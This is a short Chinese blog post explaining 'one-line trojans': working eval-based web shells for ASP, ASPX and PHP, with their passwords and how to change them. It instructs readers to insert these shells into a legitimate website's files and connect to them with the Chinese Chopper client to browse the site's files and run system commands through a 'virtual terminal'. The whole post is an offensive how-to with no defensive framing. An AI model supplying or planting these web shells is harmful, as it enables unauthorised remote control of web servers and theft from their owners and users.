asp、aspx、php的一句话木马
asp的一句话是:<%eval request("pass")%>
aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成wc,那么改完之后就是这样的:
<%eval request("wc")%>
其他同理,要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了,在菜刀主界面,右击,选择“添加”,在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填,
填完之后单击“添加”,就可以了。添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了
版权声明:
作者:亦灵一梦
链接:https://blog.haokaikai.cn/2018/pojie/webpj/564.html
来源:开心博客
文章版权归作者所有,未经允许请勿转载。